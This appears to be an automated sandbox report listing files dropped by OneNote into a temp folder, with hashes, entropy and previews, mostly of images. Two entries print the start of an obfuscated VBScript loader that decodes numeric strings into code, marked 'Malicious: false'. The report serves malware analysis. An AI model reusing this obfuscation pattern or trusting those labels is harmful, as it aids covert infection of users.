SSDEEP:	384:gzPrAZvq82AP0/DHbSczEegiAh1Hfgr3ZO7EFKWHaXIXqu:erAZz200/TbJzDgiWgjZO7EFKEaXIf
MD5:	2628353534C5AD86CBFE57B6616D46DD
SHA1:	244B7E39D6CEF5B07FCDE80554D31F7DA240BB0D
SHA-256:	69BDB000AC7E030B0B28E6CE78F19547D235355B3B841146951AD1294429FA51
SHA-512:	2529F97BE62DE038445D1C86EE2C01404FB1A2D83A5D16C7B5F4E21723C17EC86FA180DFE10342536CFD7D334EA3AF1FFE151B77F2FBFFFE8E7B2A0C2A3ACD59
Malicious:	false
Preview:	.PNG........IHDR.......1.....).'....sRGB.........pHYs..........+....1.IDATx^.}.w\.n...A.H...E.J...l.......p...\{.w...e.-K.%..d.9..DN...^}..p.L...._$.t...n.=U..ID..]~(.?.)J...-.../.......0V..........'.)1X..c..D..2..A'f."...Ru..R=b..\....\.n.0...7.~".'..s!bd.\|..p.u....-w'.....R.........i]..r....A.........r#...W..f{O.2~C.O........{.....3..W.}e:...~.....4.......t.Mv_....}f..I...x11....d..6.@..O.......f.e..K.....L]..gohj&D..+.....#...#.J...n/]...8~.....zx.'.LI6..W....p...................V.F.. ...y.[.kl<?.^....N..$..7j.biU....c.51{S{.....q....c...<..x..............zG.F.........U.w..fE.....DU.......WG7.5uC...7.....j..7yM...~jU..;J..a\|LoG..x..<^.Z ...Z.....ip....._.4......f.rg..[...z....x1k.....z...K.l...;6.\..Y.#.WT.p.@{W....>.+..*..W....'v.nV...YA[.q!\.\...9..3.[\|....7...HO......2<.....w.,].T^eN..XB.....M3...I.k...e..8...lZ.R...T.%......\|N.w..9..!..O.-p..NA.eD_.d..nW2!...N...z>..;....=t#....H,.N.\|. ......EC..............1.\

C:\Users\user\AppData\Local\Temp\{2469E2B0-BE2D-43E5-98D6-6559AFF9E463}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	11886
Entropy (8bit):	7.946442244439929
Encrypted:	false
SSDEEP:	192:sqNuEpzsnKxkfLaZCdMh+cLApmRausyZwYMAisQKShDBlhr34ckckcZ:JNu6DMLaZsMhtLAIa0wYMAvI5V4DDQ
MD5:	875CFB3B5C3619253223731E8C9879E5
SHA1:	6372F4F5BEB6EEAE3EDBE5B62EE73039B40AD01E
SHA-256:	CC69BAE5D2C8F56B28BA4E3C6A11F57C4E8CCCE69943ACFBE7E63B4FC90EE5F2
SHA-512:	47F45A3275B8454F8000F4567153DD7D4AF3012005D8E34CB18AED6AD69083BEC753E607F275FBF3EFCCB7BA00310A04ADFBD5FA5B73E6BBE47CE73901C35CA8
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..x.U..I...JB..;H..."..(U.EE\\..._v]W..b...Az..{G:J..B.$...H.IHB.o2xE..3gf..w..2....w..s\|.....C.$@.$.....t.!........8......RR....<...6..P\|\|....$@.$@...PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.z.#........1@.$@.b.PO.p... ....2.H..H@......B.$@..S.......!@=..VH..H.z.. .. .1...b8......PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.'++kH.G.=Z!.U...73o^.IH..O\|jrj.D.......I.M.........Kph.............R.x.......RU8_".......j.......B"O.z.\|.9.."..L....Y.d.Rej.-Y.dhX....:.xH.z.!(>&..4.....O.<..T\.%a..e.....UnR....+j...2.."..M.O>.z......T...].j....m...S.`..&..)....f..2..............+..SP..?.a...=.....3......K.zj.5.fP.......2:..?.....%....d.qxC..W.~.._....!.W..6....iJ).(..wg.}.]sw\.r]...r"...e_-....5_9.YN'...PO-.d.:.%..wZQ...H...JMJ.6c....\|g..,.3.....T...o..Nyc.W.....A.3.._...U%...PG.z.....&.%.v....AIm.....~.

C:\Users\user\AppData\Local\Temp\{25616D72-56E0-4EC2-9BE3-FBB0DF640DBD}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2599
Entropy (8bit):	7.903700862190034
Encrypted:	false
SSDEEP:	48:PmCwDJh8w9JewaF2zQNXXj8zq1KM43sxXxjYbTgJW1MFsrJ075CawGjGj:P1Ah8UewaFcgz82Kx8xXNYb3id/yj
MD5:	E88131C9AAC52649FF044905ACAB9B76
SHA1:	34AE73B9165CBED0DDF33AC20E4B3E7D622C19BF
SHA-256:	30F22340F582F9A352A7ED3048D1088F178E83CCAACAC1CCFD86852C8F9C78E3
SHA-512:	97AFE8F3A2A3138613934AC737C390A35F6757BFC3D381EA7C7CD148F739932380DCD46D0BA6F590C274F8BFB4D4286B3C0433AA69E090102A8A9ABDD7C97EB1
Malicious:	false
Preview:	.PNG........IHDR.......M.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]kl.U....B\|E..>.....Q........b[.K........m.(..... ...!%1%-B.C~(&`[.....-.....~.w3..Kw.3wvfzn.2{..s.....{w..\....!.3..:..!..../..zD.x...O.K... ^.1...8.G...z...D.$...........>!..V..`v.CQQQ!..-L...../3.2......ZH.?s...Iu\N..,3.?.p..N......<....E.<.=z..Iu<ll.dX...g....+.{X.p.....:..t...a...cKK.\|...Yszl.N.:......KPs.):).T.5...&B.....5j``@...(_r.V.j..m...?x.sg...t\.dz.'^.=.\.h..<.y....:.I...w..ze.m.\.qPJu.....D.\|..@......W..t.+.....X....e....\H+.Ns%^r.VS.N.3:...&...._..#^....d! ..F.....xc..M...q...17.z...z&C...K9(.Ifm.35.v.>.'X,...p.:=.H...J.K.,...:~...7.t.....R..R..9..?....l../.(...0z0.M.f.)H..Y_"e......B........L...q.K......\|;..L.........xI.K3.M..%........./..){....R....s...7....).q.._R.4O.a3......<..%....3#.\|>..y...u...R'.P..$Klz...........,...g.....`.7..\...x>.{p\;>+.,.....e.-..Re@.N..FY_....*....]}...[..h.M.oq.S.U...c_}`......8TP....

C:\Users\user\AppData\Local\Temp\{27F77280-EEAA-43D2-A902-AB20AF295A25}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	HTML document, ASCII text, with very long lines (792), with CRLF line terminators
Category:	dropped
Size (bytes):	55113
Entropy (8bit):	5.216959514455489
Encrypted:	false
SSDEEP:	768:n9Te2jdcdTeNtu1t/nl8BFWVyeaNhvsbsS:9TVdaeNtuXndH
MD5:	AE25F2104967B2708AC9DBA80AAC52FD
SHA1:	7AC0150B43CBB5EEBA9A0F956E1291DF6790F3BF
SHA-256:	11B3D1564B12934489281250C9A683F076FE10254BFDD7DA72307E538838EC56
SHA-512:	D4A7F95631E7EB88FDADBE66D31BF9C7459D0F80CA2C9174952AAD42BFF6262241B25916E6A089F778990BE981A2CF220BAA69AD261314247C286397553DECCA
Malicious:	false
Preview:	<job id="cucuparu">..<script language="VBScript">..fastenedy = fastenedy + ("\ocw40599\ocw39558\ocw37476\ocw34353\ocw38517\ocw40599\ocw38170\ocw40252\ocw21167\ocw17003\ocw4511")..megamouthy = "megamouthy"..girlohy = girlohy + ("sycrwf\ocwfalsetreatedyextenuatingywhomytreatedy")..mendy = "mendy"..waryfishy = mid(girlohy,7,4)..'tegerytegery..elementumy = Split(fastenedy,waryfishy,-1,0)..wonderingy = "wonderingy"..for prepossessedy = 1 to Ubound(elementumy)...jestinglyy = jestinglyy & chr(Clng(elementumy(prepossessedy)) / 347)..Next..'wonderingywonderingy..fastenedy = fastenedy + ("\ocw39905\ocw35047\ocw40252\ocw11104\ocw35394\ocw39905\ocw38517\ocw34006\ocw36782\ocw35047\ocw34353\ocw40252\ocw21167\ocw34353\ocw39558\ocw35047\ocw33659\ocw40252\ocw35047\ocw38517\ocw34006\ocw36782\ocw35047\ocw34353\ocw40252\ocw13880\ocw11798\ocw39905\ocw34353\ocw39558\ocw36435\ocw38864\ocw40252\ocw36435\ocw38170\ocw35741\ocw15962\ocw35394\ocw36435\ocw37476\ocw35047\ocw39905\ocw41987\ocw39905\ocw40252\ocw35047

C:\Users\user\AppData\Local\Temp\{289BE926-6AF9-40DA-9703-44B81BBBF62E}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	HTML document, ASCII text, with very long lines (792), with CRLF line terminators
Category:	dropped
Size (bytes):	55113
Entropy (8bit):	5.216959514455489
Encrypted:	false
SSDEEP:	768:n9Te2jdcdTeNtu1t/nl8BFWVyeaNhvsbsS:9TVdaeNtuXndH
MD5:	AE25F2104967B2708AC9DBA80AAC52FD
SHA1:	7AC0150B43CBB5EEBA9A0F956E1291DF6790F3BF
SHA-256:	11B3D1564B12934489281250C9A683F076FE10254BFDD7DA72307E538838EC56
SHA-512:	D4A7F95631E7EB88FDADBE66D31BF9C7459D0F80CA2C9174952AAD42BFF6262241B25916E6A089F778990BE981A2CF220BAA69AD261314247C286397553DECCA
Malicious:	false
Preview:	<job id="cucuparu">..<script language="VBScript">..fastenedy = fastenedy + ("\ocw40599\ocw39558\ocw37476\ocw34353\ocw38517\ocw40599\ocw38170\ocw40252\ocw21167\ocw17003\ocw4511")..megamouthy = "megamouthy"..girlohy = girlohy + ("sycrwf\ocwfalsetreatedyextenuatingywhomytreatedy")..mendy = "mendy"..waryfishy = mid(girlohy,7,4)..'tegerytegery..elementumy = Split(fastenedy,waryfishy,-1,0)..wonderingy = "wonderingy"..for prepossessedy = 1 to Ubound(elementumy)...jestinglyy = jestinglyy & chr(Clng(elementumy(prepossessedy)) / 347)..Next..'wonderingywonderingy..fastenedy = fastenedy + ("\ocw39905\ocw35047\ocw40252\ocw11104\ocw35394\ocw39905\ocw38517\ocw34006\ocw36782\ocw35047\ocw34353\ocw40252\ocw21167\ocw34353\ocw39558\ocw35047\ocw33659\ocw40252\ocw35047\ocw38517\ocw34006\ocw36782\ocw35047\ocw34353\ocw40252\ocw13880\ocw11798\ocw39905\ocw34353\ocw39558\ocw36435\ocw38864\ocw40252\ocw36435\ocw38170\ocw35741\ocw15962\ocw35394\ocw36435\ocw37476\ocw35047\ocw39905\ocw41987\ocw39905\ocw40252\ocw35047

C:\Users\user\AppData\Local\Temp\{28CC4680-55C1-499E-A772-8714E9C0D0EE}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	11886
Entropy (8bit):	7.946442244439929
Encrypted:	false
SSDEEP:	192:sqNuEpzsnKxkfLaZCdMh+cLApmRausyZwYMAisQKShDBlhr34ckckcZ:JNu6DMLaZsMhtLAIa0wYMAvI5V4DDQ
MD5:	875CFB3B5C3619253223731E8C9879E5
SHA1:	6372F4F5BEB6EEAE3EDBE5B62EE73039B40AD01E
SHA-256:	CC69BAE5D2C8F56B28BA4E3C6A11F57C4E8CCCE69943ACFBE7E63B4FC90EE5F2
SHA-512:	47F45A3275B8454F8000F4567153DD7D4AF3012005D8E34CB18AED6AD69083BEC753E607F275FBF3EFCCB7BA00310A04ADFBD5FA5B73E6BBE47CE73901C35CA8
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..x.U..I...JB..;H..."..(U.EE\\..._v]W..b...Az..{G:J..B.$...H.IHB.o2xE..3gf..w..2....w..s\|.....C.$@.$.....t.!........8......RR....<...6..P\|\|....$@.$@...PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.z.#........1@.$@.b.PO.p... ....2.H..H@......B.$@..S.......!@=..VH..H.z.. .. .1...b8......PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.'++kH.G.=Z!.U...73o^.IH..O\|jrj.D.......I.M.........Kph.............R.x.......RU8_".......j.......B"O.z.\|.9.."..L....Y.d.Rej.-Y.dhX....:.xH.z.!(>&..4.....O.<..T\.%a..e.....UnR....+j...2.."..M.O>.z......T...].j....m...S.`..&..)....f..2..............+..SP..?.a...=.....3......K.zj.5.fP.......2:..?.....%....d.qxC..W.~.._....!.W..6....iJ).(..wg.}.]sw\.r]...r"...e_-....5_9.YN'...PO-.d.:.%..wZQ...H...JMJ.6c....\|g..,.3.....T...o..Nyc.W.....A.3.._...U%...PG.z.....&.%.v....AIm.....~.

C:\Users\user\AppData\Local\Temp\{2CF92CDE-DCBA-4A31-BF13-93A235B1FF6A}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 171 x 552, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	10056
Entropy (8bit):	7.956064700093514
Encrypted:	false
SSDEEP:	192:edmu1fpj5DVHuooK4EpGLbAdT+dBXYBR8D1V2p6KwoPR6KUX9ojwRpgA:2Pp/B4LbAF+dBo/1E3S6JScpgA
MD5:	E1B57A8851177DD25DC05B50B904656A
SHA1:	96D2E31A325322F2720722973814D2CAED23D546
SHA-256:	2035407A0540E1C4F7934DB08BA4ADD750FCB9A62863DDD9553E7871C81A99E3
SHA-512:	BC7DC1201884E6DAFDC1F9D8E32656BFAEE0BB4905835E09B65299FE2D7C064B27EAA10B531F9BECF970C986E89A5FD8A0B83F508BBA34EB4E38B3F7F5FC623A
Malicious:	false
Preview:	.PNG........IHDR.......(.....!..t....PLTE.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................4.....bKGD....H....cmPPJCmp0712....H.s...#.IDATx^.w`......$..B....... ....fz5..6`l\.8...Nsz{.//y./....{.7}g.....e.....~.......s...f.....%c...6....O.PJ...Y.oi...9..'j.2..6.-

C:\Users\user\AppData\Local\Temp\{2E4E3522-7F76-4065-8B96-2F0D9B0F5CB0}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1604
Entropy (8bit):	7.814570704154439
Encrypted:	false
SSDEEP:	48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
MD5:	3F1535054D4F9626F0EB10CEE47F076E
SHA1:	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
SHA-256:	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
SHA-512:	2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
Malicious:	false
Preview:	.PNG........IHDR.......1.....[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....\|.O\|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH\|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.WR.c....I1.......<y.%...-..."Y@....)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

C:\Users\user\AppData\Local\Temp\{2F5C2CCF-581B-4AD0-B27B-B2CC91516B2E}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4490
Entropy (8bit):	7.928016176674318
Encrypted:	false
SSDEEP:	96:WXKr7Xwf6Obg+XaGOnsjbbGSb+ydWtRvEOhDE6XqPeosv02tR45boo:3rTUgXZnsHKSb+n+8DdKlwm
MD5:	7F161B19B937AB48D4FD2F6E5E16FDBD
SHA1:	BDCE4F1C73E87E609A7FDF245A512CA4F73B35B9
SHA-256:	C863C5E71D1116D69561BD0637F4FE4C4240E9CED05B8A5B056073AD13E6495D
SHA-512:	E915B76FAAC9512D2AD11CF4E4530A19BEA1C7D8508BC218C69CB041F1EEABA3E2E03B1D56E61B032A6418829752C21B8354AF1335466D7E1528A06E6742A461
Malicious:	false
Preview:	.PNG........IHDR...T...O.....;.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..p.U..'...rD.WX.... Q.. ....."$.ZHP.Z...C...........R..%G8R..... .R.C6..A.b...0...^...#..g..........z2.....nB...l..X.&._.a,...a,...a,...a,...a,._.73'N..ukeee.6mZ.n.m.G.}...n...a.9s.DGG....y...8??.o.pE1....Y.,......).ca.i.M.:5$$.........Lr...ye........6...8...z.-r....d.(.xc..U..^11...._>.QX..y..2...T...sss1..."A.?_.;w..S.F>......4.G.......D.\|...@.K...............C...k...P...q....6.`QQEE................7;;;.._\q.k.\|...\.z..6j>..n....Y.&G.n.S$))).....r........}.{[Dv:,..w..A...`..........a.~.N.f.s...P.....'7n....eK....+.n;:.W..C..9}..O..D.q..X..5i.s~en.c..F&..?.....l.]3r...W`..#..7o..R.@^.....W..?}t...{.B.8..D...UPa..~..C...\|.C].a.9..R...c.Y0..9.u...d...C.......X.U....WK.....5...'..PM.`...<. ._.z.F^^.EH.K>_.0.d..S...Yj<..~.5.?l.fZ0.@d.......G...K.....e...b.\|e..Q.4.....('z...!G.....2..XQx\......X...2.\h..X~.e....Z....=....C.1.......w.....d.z.

C:\Users\user\AppData\Local\Temp\{30BB3FEC-12B4-4686-B2C0-2A70C10279B7}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1604
Entropy (8bit):	7.814570704154439
Encrypted:	false
SSDEEP:	48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
MD5:	3F1535054D4F9626F0EB10CEE47F076E
SHA1:	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
SHA-256:	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
SHA-512:	2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
Malicious:	false
Preview:	.PNG........IHDR.......1.....[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....\|.O\|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH\|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.WR.c....I1.......<y.%...-..."Y@....)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

C:\Users\user\AppData\Local\Temp\{33A69E53-C613-4390-A255-FF02E6FF2A93}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2332
Entropy (8bit):	7.8822150338370776
Encrypted:	false
SSDEEP:	48:jB5Gg4vMs30WIn5IVeRy1bY7DqbqQBAeNjukXlN4AXat:PGYuEWV/YH7e1uA0AXat
MD5:	91CB7F1273AA003076401081B8A22237
SHA1:	5157144069E7D2FDAE60B397BE5851E75BDF7707
SHA-256:	80682DD6472E8D1136BC5E20F6DE87B595562414B19EAB8E965736FE992921B0
SHA-512:	5A8E3C0ED0DB94BFE359C63793F12F3D7B3C37F3A13A5C96634BA1DC8C9E50FB1142FE4752FD9FBFA39A682F78C54AF868AD337EAA787801FE5F66D8F55A8196
Malicious:	false
Preview:	.PNG........IHDR.......L.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.\.LUe......Ji("....9....-.."..5L.Y.Y.....$350.."2.lK3Cg...T..DWZ.......i.?!<..~x..z.......w.sw......9....s...w..l6.:....p"dH...F..B<...qE,R$G\!..E..".).#...."..{f.PyI.d..l;....;.=.S...O.S[.\Y^P.aj]9*Y!. ..~..#...S.s...l..h.[m....%...P..@.kG......G..X.r\|%..AO.}-..G>35..c....Ac.&[W.d..+...zG........=..l...VS.d..+...tGd..k-._.....oL.:}.p.~.W$C..\|...I...n...~......,.i......e..=..?{......>r~.Lw.+2..\w.)w~...c....h..u..%...PE...f..'..m.ZE.1.\....U.`X......$...P%..UH{[K..o7~.k.49..W.t.~.^_..7.,....f."q....+....;...~;.c.......Xb.\?...........0h.lV..WX!.....ljm.1c..U...[..X.)......B=.0~..W...rO..j...ehI5U:..66V5sJ.....V...]Y>...1kQH..2.........d....S....I...+..].p.....m7...Z....s.D>.K/]..?.l....2..=..~.mq..".+.....,..8. v.o.).Z......>..Xv..i...TA....M.....>[X...Y.7lJ..e7..S.....02q.O&9.......:L....N.......W....d..FqE..T..N.....R....kXv[..j......g.K.\@`.M..B}8n

C:\Users\user\AppData\Local\Temp\{34C32B91-CD2F-42D0-AD9C-D7316D730966}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	13084
Entropy (8bit):	7.940058639272698
Encrypted:	false
SSDEEP:	384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
MD5:	0693DABBBC411538D209F32E22F622F6
SHA1:	FB7E675406FA123CDB7E058D336742D6A2E8DC8E
SHA-256:	2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
SHA-512:	F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
Malicious:	false
Preview:	.PNG........IHDR.......~.............sRGB.........gAMA......a.....pHYs..........o.d..2.IDATx^.w....'m.9c.6"...&.`.N.(.TN.Ne.N.R.eKr..T.[...?T..:I.D.S>I$A...I......y.9...f......3...Gh.....}_.o....n..A@.....A@...L...2... ..... .x...#. ..... .....1f]9.[.....A@......3 ..... ...fE@x.YWN.....A@......1...... .....Y..J.Y.N.....s"................./..rc.scuyyyu...\s....t.oi..j..lv.....Gr.#9%%%9%--....d.T...r...DH...6.....%U..A@.0.....rAD ........2.5.......L.R..=W...gZ.`o..-?.T.Cy.:...y.9..y.EE...v......1..R.....1.".... `"...ss.......i.!.hY...Fj....%.-.Gw...HJJr8..6...#.......!(.?P.(.....8(u..........OOO..........dgg....Q..=..c.y....A`S.@.......3.CC..GFfg. .I.I.COrJFFFNNV^nn^^.z..%..(...^.b$........a..y.LMO-.,ylV+.k...T>Jg..//-+-......M=..x.....E.... `~..N.Kww.......z...%%.e.%.yy.i...P.)'.,A.5.d.0.Cc35==66>2::33..>..;..Ii.i.gv...DSd....l#...l..............................),...V..1 .F.'7....)..SSs..7..F...C.p....(*,......(RG..B...l!.2. ....\|r1

C:\Users\user\AppData\Local\Temp\{356C426D-2428-44D1-AB6E-F99E3A64E321}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	11449
Entropy (8bit):	7.91552812501629
Encrypted:	false
SSDEEP:	192:/zgGDSJ0ke0kBER0C31jm1OSZi6/ccccccc3zzRmKHDr1NFnAaLJ5rBX8iaD7:/UGe6m7XdJS86kvRBHD5/nAa95rB9aD7
MD5:	163E6791C87E4999C343EC5E23843B15
SHA1:	43CE3BAE19E22876483A7FD0E93DB45790373600
SHA-256:	DEB2B126977EA150E49CDB3ACF4F5387639C7B7B5583454EDF55ADF83DFAB720
SHA-512:	98BE1F4684F99A9FD2F313B09A113B5C310EC8BA8EB0EBF5FD69765E5B48B001D39999E3F25A7E76C7344DCF57B4F0BF2E4614FB0E0DFCCB6F02E6D1CAAF7FDD
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..,NIDATx^....E...@^.T.....H..$..(.!..3....O=Q...<.9.`@E...CE.(""..H.$..6.......]3......tW}U...w*~....W./. .. ..........m..H..H... ..........'...G...W.=#.M.$@.$p...........!@=U.VH..H.z.g..H........H+$@.$@=.3@.$@.j.PO.p... ...... .. .5...j8......PO..........o....+.Z.Pb.FH.......D.g\........._..'0.......9.>............&..PO.z..)-..........R....'@=U..I.&.g......../....SO.\.,._.@7Q.g.}V+../..Ht.I=..WZ%.{......_v.....%U.)^H(!!..q....\|.H.E.DG_....o../...T.i...z.%.4K..# %.-.(...4J`i..,.P....F.D.zj..#..@.).(...o.....S..)..i.z.g...h..8.......A<d.z....<...n.]...E....(Jj4P;._.N..Q...)..8U.u.e).j.e...E\|.]."..t6.[.K..5.6.....B..(.=W./....S'.......z.FY.. ...PO.".tI...F...Q....c.o.....}...r>..3c9I../.......}......I..G.\|..\|...~.b.e.5.OGb..o.....w....i.e...5&.,Z.H......g..KY.<.nZ.x...HHbdS.Z.\.O..1Q.K...9....Z.L....\g#.._~9###%%.O.>.Rvu..C.....S..g01..j...?-../...Q..N.:._....1.!

C:\Users\user\AppData\Local\Temp\{36436631-8EE3-4151-A866-93E25FA067E1}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	40884
Entropy (8bit):	7.545929039957292
Encrypted:	false
SSDEEP:	768:MCBOA4d+ElOXJ/3pI7cRBiL7L6qERqGz65WXzZqJsKQSbIsTT6XB:hIAU+2cGdLX6qBG4WDZl4Ihx
MD5:	7379775A1E2AB7FAB95CFFCE01AE05F3
SHA1:	3D3DDFD8AC7E07203561BAE423D66F0806833AB3
SHA-256:	9301DB6D2D87282FCEE450189AEACE16D85F64273BF62713A3044992B6B7A9E9
SHA-512:	4B5006E620E80D3A146944649CF4CA619782CAD7E8C4CD0D1DE0EBCA0FA05EACB7378DAFCEED3E26F5698B07F19604614D906C8F51F898660E2F129D8DEC6F62
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!.1A.....Qaq....".....2....BR#S..br...3T...C$.7(Hx....4D.G..Xh.cs..'..t...%...8.....................1...!AQ..a...q"2.4Tt.......R3S....Br...#s...Uu.bc.de..$D..6..C%E..............?...z...;sB.yv...........]t.\...n...../....m....M.=.3G+..x+.....S).*&.J../..8..O/+..sG...p...<!....~.c..C.w..,[oHom.wc-.J.~.......L[..6...'..i_..S;...!Y.z.q].EK..M.x...i.x.+.;.+...}....#......f.)........e6V..p.;........s.)..Ml.J......IU.6...<9+9.^..l..Y...[._...2..^..j.ia...._..3.;...~..<3...;......z.^.......]..Qk.,...Yk...3.3Jy^p.}....q...I...&..t.......;..9.g.GH;..'...%...)..[..y..../...zCn..>...'...1e.Y..;....]..7...N>t..m-.j.............H^..T\.q.ru...}...eTn]I'r.^].#..wOY....v

C:\Users\user\AppData\Local\Temp\{369B15FD-4FC8-45FB-926A-C109A6FFF6C7}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 85 x 470, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	11197
Entropy (8bit):	7.975073010774664
Encrypted:	false
SSDEEP:	192:p9wNdtRKcVHso6zsqm06xaqZdingVzLZ7/PGSIz/yycRTbChh/JzhbEx15RGb:mdtMcVHqgAqTinMzLZ7/uSIz/yTR/mhF
MD5:	DDC3CC30794277500EFE4BC6667EC123
SHA1:	EFC9642C1F95B5FC38764476AE481649C016FA0C
SHA-256:	7F5B660A1A0BF46C75AAF19B4F77A0E086DE003EC03AFC1F58D871D55AA5BA9E
SHA-512:	25232A84604C3959634D33090238FEC8D51E40AD84EB3A08BB8522A81BE1E83378649C014E98E1DFCDF46B7BFAC92D8D2429211CD11D7EE0334C9C3DF7C1B6A6
Malicious:	false
